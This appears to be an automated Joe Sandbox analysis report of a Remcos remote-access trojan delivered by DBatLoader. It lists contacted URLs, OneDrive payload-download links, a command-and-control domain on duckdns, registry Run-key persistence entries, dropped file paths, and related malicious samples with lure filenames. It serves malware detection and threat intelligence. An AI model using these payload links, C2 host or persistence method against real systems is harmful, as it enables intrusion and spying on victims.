https://deff.nelreports.net/api/report?cat=msn | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oqgp5g.db.files.1drv.com/y4mS7-09cDgh9l-spZEVYc4X4sz7LO4DIkbEuCnO10bm0osuWSl7tRLcAVFGx7-sRmq | remcos.exe, 00000013.00000002.1918208186.0000000000868000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://onedrive.live.com/gR | remcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/D | remcos.exe, 00000011.00000002.1739100863.00000000009BB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejbl | remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gp/C | fu56fbrtn8.exe, 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
http://geoplugin.net/json.gpL | remcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/L | remcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://live.com/ | fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.0000000000772000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.000000000097D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://onedrive.live.com/B | remcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://geoplugin.net/json.gpL9 | remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | - | high
http://www.imvu.comata | remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oqgp5g.db.files.1drv.com/ | remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3a | fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Y | remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adw | remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://live.com/S | remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.office.com/ | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
http://geoplugin.net/json.gpoft | remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7 | remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com:443/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If5 | remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com:443/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLC | remcos.exe, 00000010.00000002.1647920314.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59 | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
http://www.imvu.com | remcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=wsb | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpLL | remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://oqgp5g.db.files.1drv.com:443/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x98 | remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com/)hVS | fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com:443/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFo | fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
http://geoplugin.net/ | remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmp | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717 | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269 | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | bhv2770.tmp.9.dr | false | URL Reputation: safe | unknown
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8 | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | Avira URL Cloud: safe | unknown
https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey= | remcos.exe, 00000013.00000002.1928082246.00000000140F0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://live.com/l | remcos.exe, 00000013.00000003.1914864143.0000000000810000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oqgp5g.db.files.1drv.com:443/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS | remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.pmail.com | fu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://ocsp.sectigo.com0C | fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ebuddy.com | remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& | bhv3CFC.tmp.13.dr, bhv2770.tmp.9.dr | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
103.186.117.142 | oceansss.duckdns.org | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNet | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430790
Start date and time: 2024-04-24 07:19:38 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fu56fbrtn8.exe (renamed because the original name is a hash value)
Original Sample Name: da7c2473b5c455f25f420827af596286.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@27/17@5/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 49
• Number of non-executed functions: 239
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryAttributesFile calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtReadVirtualMemory calls found.
Time | Type | Description
07:20:28 | API Interceptor | 2x Sleep call for process: fu56fbrtn8.exe modified
07:20:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cmzcxhwn C:\Users\Public\Cmzcxhwn.url
07:20:35 | API Interceptor | 6204576x Sleep call for process: remcos.exe modified
07:20:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"
07:20:45 | API Interceptor | 2x Sleep call for process: Cmzcxhwn.PIF modified
07:20:53 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"
07:21:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cmzcxhwn C:\Users\Public\Cmzcxhwn.url
07:21:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.139.11 | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher |
13.107.139.11 | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | Signed Proforma Invoice 3645479_pdf.vbs | malicious | FormBook |
13.107.139.11 | ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | 20240416-703661.cmd | malicious | DBatLoader |
13.107.139.11 | 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | Oeyrmdo.exe | malicious | AgentTesla, PureLog Stealer |
178.237.33.50 | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | СПЦ №130 от 12.04.2024 подпис..exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | TcnD64eVFK.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Quotation.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | BRUFEN ORDER VAC442_7467247728478134247.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | copy_76499Kxls.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | payment swift.xls | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | FINAL CMR.-Transportauftrag Nachlauf new.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
103.186.117.142 | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader |
103.186.117.142 | payment swift.xls | malicious | Remcos, DBatLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dual-spov-0006.spov-msedge.net | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11
dual-spov-0006.spov-msedge.net | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | payment swift.xls | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader | 13.107.139.11
dual-spov-0006.spov-msedge.net | pSfqOmM1DG.exe | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher | 13.107.139.11
dual-spov-0006.spov-msedge.net | UGS - CRO REQ - KHIDUBAI (OPL-841724).scr | malicious | PureLog Stealer, zgRAT | 13.107.137.11
dual-spov-0006.spov-msedge.net | SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe | malicious | Remcos, DBatLoader | 13.107.137.11
dual-spov-0006.spov-msedge.net | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader | 13.107.139.11
dual-spov-0006.spov-msedge.net | 2020.xls | malicious | Remcos, DBatLoader | 13.107.137.11
oceansss.duckdns.org | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 103.186.117.142
oceansss.duckdns.org | payment swift.xls | malicious | Remcos, DBatLoader | 103.186.117.142
geoplugin.net | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | СПЦ №130 от 12.04.2024 подпис..exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | TcnD64eVFK.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Quotation.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | BRUFEN ORDER VAC442_7467247728478134247.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | copy_76499Kxls.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | payment swift.xls | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | FINAL CMR.-Transportauftrag Nachlauf new.exe | malicious | GuLoader, Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 103.186.117.142
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | 1mHUcsxKG6.elf | malicious | Mirai | 103.183.144.35
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | payment swift.xls | malicious | Remcos, DBatLoader | 103.186.117.142
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | W5xi2iuufC.elf | malicious | Mirai | 103.169.166.27
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | jdsfl.arm.elf | malicious | Mirai | 134.115.167.10
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | jdsfl.x86.elf | malicious | Mirai | 150.203.163.71
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | SocUwyIjOh.elf | malicious | Mirai | 157.85.230.5
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | tajma.arm7-20240421-1854.elf | malicious | Mirai, Okiru | 103.174.73.190
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | tajma.x86-20240421-1853.elf | malicious | Mirai, Okiru | 103.174.73.190
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | cfGjk0Keob.elf | malicious | Mirai | 103.171.246.120
ATOM86-ASATOM86NL | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | СПЦ №130 от 12.04.2024 подпис..exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | TcnD64eVFK.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Quotation.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | BRUFEN ORDER VAC442_7467247728478134247.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | copy_76499Kxls.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | payment swift.xls | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | FINAL CMR.-Transportauftrag Nachlauf new.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader | 178.237.33.50
MICROSOFT-CORP-MSN-AS-BLOCKUS | Payment MT103.xls | malicious | Unknown | 13.107.246.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | Ref_Order04.xls | malicious | Unknown | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11
MICROSOFT-CORP-MSN-AS-BLOCKUS | 3Shape Unite Installer.exe | malicious | Unknown | 40.67.232.186
MICROSOFT-CORP-MSN-AS-BLOCKUS | OHkRFujs2m.exe | malicious | Unknown | 104.208.16.94
MICROSOFT-CORP-MSN-AS-BLOCKUS | SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exe | malicious | PureLog Stealer, zgRAT | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://wmicrosouab-4ba8.udydzj.workers.dev/ | malicious | HTMLPhisher | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://uqgekpc20qn1.azureedge.net/6466/ | malicious | TechSupportScam | 13.107.213.69
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2w | malicious | HtmlDropper, HTMLPhisher | 13.89.178.26
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://netorg442802-my.sharepoint.com/:b:/g/personal/darek_daronto_com/EeXtnEaZ3XJBqGk13it6odUB-K9vuYAC7zp7SfyciZ3BpQ?e=nkKu2w | malicious | Unknown | 13.107.136.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Payment MT103.xls | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | Ref_Order04.xls | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | OHkRFujs2m.exe | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | RisePro Stealer | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | z56NF-Faturada-23042024.msi | malicious | MicroClip | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | 768.xla.xlsx | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | Gam.xls | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | szamla_sorszam_8472.xlsm | malicious | Unknown | 13.107.139.11
a0e9f5d64349fb13191bc781f81f42e1 | iPUk65i3yI.exe | malicious | LummaC | 13.107.139.11
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\Remcos\remcos.exe | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader |
C:\ProgramData\Remcos\remcos.exe | payment swift.xls | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\Cmzcxhwn.PIF | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\Cmzcxhwn.PIF | payment swift.xls | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
C:\Users\Public\Libraries\easinvoker.exe | HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | payment swift.xls | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | Purchase order.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | Quotation 20242204.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | pSfqOmM1DG.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader |
C:\Users\Public\Libraries\easinvoker.exe | 2020.xls | malicious | Remcos, DBatLoader |
Process: C:\Users\user\Desktop\fu56fbrtn8.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1639424
Entropy (8bit): 7.422807171812134
Encrypted: false
